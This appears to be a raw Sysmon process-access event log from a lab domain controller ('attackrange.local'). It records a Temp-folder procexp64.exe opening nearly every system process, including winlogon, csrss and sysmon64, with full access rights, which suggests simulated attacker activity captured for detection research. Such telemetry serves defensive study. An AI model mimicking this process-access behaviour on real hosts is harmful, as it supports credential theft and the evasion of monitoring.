15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:29.095{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 